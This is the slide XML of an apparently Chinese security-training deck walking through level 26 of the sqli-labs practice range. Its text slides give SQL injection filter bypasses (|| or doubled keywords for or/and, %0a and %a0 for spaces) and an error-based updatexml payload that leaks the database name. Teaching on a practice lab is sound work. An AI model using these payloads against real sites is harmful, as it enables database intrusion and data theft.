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1457" r:id="rId2"/>
    <p:sldId id="1394" r:id="rId3"/>
    <p:sldId id="1486" r:id="rId4"/>
    <p:sldId id="1493" r:id="rId5"/>
    <p:sldId id="1487" r:id="rId6"/>
    <p:sldId id="1488" r:id="rId7"/>
    <p:sldId id="1490" r:id="rId8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7">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="37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z" initials="x" lastIdx="1" clrIdx="0"/>
  <p:cmAuthor id="2" name="秦 莫天" initials="秦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FEFEF"/>
    <a:srgbClr val="A5A5A5"/>
    <a:srgbClr val="003366"/>
    <a:srgbClr val="3399FF"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="5F5F5F"/>
    <a:srgbClr val="FFCC00"/>
    <a:srgbClr val="66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6026" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="74" d="100"/>
          <a:sy n="74" d="100"/>
        </p:scale>
        <p:origin x="1042" y="72"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1977"/>
        <p:guide pos="3721"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="32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6885" y="720725"/>
            <a:ext cx="640143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7A1ED033-5F5C-4572-AE4B-7CFF71C657D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 descr="掌控者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3835" y="1240790"/>
            <a:ext cx="1740535" cy="621665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 102"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12193201" cy="3068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" name="AutoShape 103"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3759570" y="3113088"/>
            <a:ext cx="7823970" cy="8382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" name="Rectangle 105"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10262610" y="1741488"/>
            <a:ext cx="71127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" name="Rectangle 106"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="9246510" y="1131888"/>
            <a:ext cx="121932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8" name="Rectangle 107"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10770660" y="141288"/>
            <a:ext cx="121932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" name="Rectangle 108"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8738460" y="7508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" name="Rectangle 110"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8433630" y="28844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gray">
          <a:xfrm>
            <a:off x="508050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gray">
          <a:xfrm>
            <a:off x="569016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Rectangle 124"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="599499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Rectangle 126"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="629982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5" name="Group 211"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6299820" y="1741488"/>
            <a:ext cx="1727370" cy="838200"/>
            <a:chOff x="2976" y="1440"/>
            <a:chExt cx="816" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 104"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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7" name="Rectangle 125"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="297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8" name="Rectangle 127"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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9" name="Rectangle 128"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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0" name="Rectangle 129"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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1" name="Rectangle 130"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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2" name="Rectangle 131"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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3" name="Rectangle 132"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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4" name="Rectangle 133"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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5" name="Rectangle 134"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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6" name="Rectangle 135"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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7" name="Rectangle 136"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552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8" name="Rectangle 137"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552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9" name="Rectangle 138"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696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0" name="Rectangle 139"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="369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1" name="Rectangle 140"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696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212"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4470840" y="1970088"/>
            <a:ext cx="1727370" cy="609600"/>
            <a:chOff x="2112" y="1584"/>
            <a:chExt cx="816" cy="384"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 112"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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4" name="Rectangle 113"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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5" name="Rectangle 115"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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6" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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7" name="Rectangle 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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8" name="Rectangle 118"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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9" name="Rectangle 119"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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0" name="Rectangle 121"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832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1" name="Rectangle 122"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832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2" name="Rectangle 123"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="283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3" name="Rectangle 141"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256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4" name="Rectangle 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="211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45" name="Group 143"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1016100" y="3570288"/>
            <a:ext cx="2540250" cy="762000"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Rectangle 144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7" name="Rectangle 145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8" name="Rectangle 146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9" name="Rectangle 147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0" name="Rectangle 148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1" name="Rectangle 149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2" name="Rectangle 150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3" name="Rectangle 151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5" name="Rectangle 153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6" name="Rectangle 154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7" name="Rectangle 155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8" name="Rectangle 156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9" name="Rectangle 157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0" name="Rectangle 158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1" name="Rectangle 159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2" name="Rectangle 160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3" name="Rectangle 161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4" name="Rectangle 162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5" name="Rectangle 163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6" name="Rectangle 164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7" name="Rectangle 165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8" name="Rectangle 166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9" name="Rectangle 167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0" name="Rectangle 168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1" name="Rectangle 169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2" name="Rectangle 170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3" name="Rectangle 171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4" name="Rectangle 172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5" name="Rectangle 173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6" name="Rectangle 174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77" name="Group 175"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7315920" y="827088"/>
            <a:ext cx="3556350" cy="1066800"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Rectangle 176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9" name="Rectangle 177"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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0" name="Rectangle 178"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2400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1" name="Rectangle 179"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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2" name="Rectangle 180"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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3" name="Rectangle 181"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2544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4" name="Rectangle 182"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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5" name="Rectangle 183"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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6" name="Rectangle 184"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2688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7" name="Rectangle 185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8" name="Rectangle 186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9" name="Rectangle 187"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="283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0" name="Rectangle 188"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2832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1" name="Rectangle 189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2" name="Rectangle 190"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2976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3" name="Rectangle 191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4" name="Rectangle 192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5" name="Rectangle 193"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3120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6" name="Rectangle 194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7" name="Rectangle 195"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3264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8" name="Rectangle 196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9" name="Rectangle 197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0" name="Rectangle 198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1" name="Rectangle 199"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3408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2" name="Rectangle 200"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552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" name="Rectangle 201"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3552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" name="Rectangle 202"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696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" name="Rectangle 203"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="369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" name="Rectangle 204"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3696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7" name="Rectangle 205"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2256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8" name="Rectangle 206"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="211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9" name="AutoShape 207"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="711270" y="2655888"/>
            <a:ext cx="10262610" cy="838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0" name="Rectangle 208"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2743470" y="42560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1" name="Rectangle 209"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2337030" y="4789488"/>
            <a:ext cx="30483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2" name="Rectangle 210"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2032200" y="4941888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2540" y="2732088"/>
            <a:ext cx="8840070" cy="6858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9570" y="3494088"/>
            <a:ext cx="751914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865" y="1437005"/>
            <a:ext cx="3223895" cy="1263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449" y="355600"/>
            <a:ext cx="8685538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0E65E-9137-4309-8D78-B392A1917D52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2"/>
          <a:srcRect r="74718" b="16204"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="558800" y="163830"/>
            <a:ext cx="669925" cy="871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3519470" y="-2"/>
            <a:ext cx="8673163" cy="4336356"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 8672711"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 4336356"/>
              <a:gd name="connsiteX1" fmla="*/ 8672711 w 8672711"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 4336356"/>
              <a:gd name="connsiteX2" fmla="*/ 4336356 w 8672711"/>
              <a:gd name="connsiteY2" fmla="*/ 4336356 h 433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711" h="4336356">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8672711" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4336356" y="43363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8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="10681752" y="0"/>
            <a:ext cx="1511449" cy="10445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27" name="Rectangle 119"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="10679636" cy="104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028" name="Group 120"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9170303" y="152400"/>
            <a:ext cx="2540250" cy="762000"/>
            <a:chOff x="2112" y="1632"/>
            <a:chExt cx="1680" cy="672"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1037" name="Rectangle 121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8" name="Rectangle 122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9" name="Rectangle 123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0" name="Rectangle 124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1" name="Rectangle 125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2" name="Rectangle 126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3" name="Rectangle 127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4" name="Rectangle 128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5" name="Rectangle 129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6" name="Rectangle 130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7" name="Rectangle 131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8" name="Rectangle 132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9" name="Rectangle 133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0" name="Rectangle 134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1" name="Rectangle 135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2" name="Rectangle 136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3" name="Rectangle 137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4" name="Rectangle 138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5" name="Rectangle 139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6" name="Rectangle 140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7" name="Rectangle 141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8" name="Rectangle 142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9" name="Rectangle 143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0" name="Rectangle 144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1" name="Rectangle 145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2" name="Rectangle 146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3" name="Rectangle 147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4" name="Rectangle 148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5" name="Rectangle 149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6" name="Rectangle 150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7" name="Rectangle 151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29" name="Rectangle 152"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8738460" y="76200"/>
            <a:ext cx="304830" cy="381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0" name="Rectangle 153"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="8941680" y="228600"/>
            <a:ext cx="304830" cy="152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1" name="Rectangle 154"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="9144900" y="304800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11270" y="1295400"/>
            <a:ext cx="109230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550" y="6505575"/>
            <a:ext cx="111771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00864" y="262255"/>
            <a:ext cx="86855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" y="-2"/>
            <a:ext cx="12242310" cy="6933462"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="CustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4035198" y="5682600"/>
            <a:ext cx="4183920" cy="550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r>
              <a:rPr lang="zh-CN" alt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朝阳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470078" y="4988520"/>
            <a:ext cx="3313440" cy="488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掌控安全学院</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" b="0" strike="noStrike" spc="-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4479" y="2564686"/>
            <a:ext cx="8239217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altLang="zh-CN" sz="1800" spc="-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sql-lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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靶场原理详解（七）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第二十六关</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479376" y="1484784"/>
            <a:ext cx="6948772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88235" y="3464560"/>
            <a:ext cx="6572250" cy="2247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404" y="1438905"/>
            <a:ext cx="8492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看到第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>题，发现这里过滤了非常多的东西，这次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>还有一些注释和空格都被干掉了，按照上面的办法我们依然可以利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>去代替</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>也可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>oorr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>anandd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>然后利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or ’1‘ =’1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>去闭合，然而空格我们可以利用一些特殊字符去代替，比如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>0a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>换行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>空格等等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第二十六关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5710" y="2060575"/>
            <a:ext cx="97764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判断库名： '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> updatexml(1,concat(0x7e,(SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>a0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>database()),0x7e),1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>||</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 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1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=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1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判断表名：'</a:t>
            </a:r>
            <a:r>
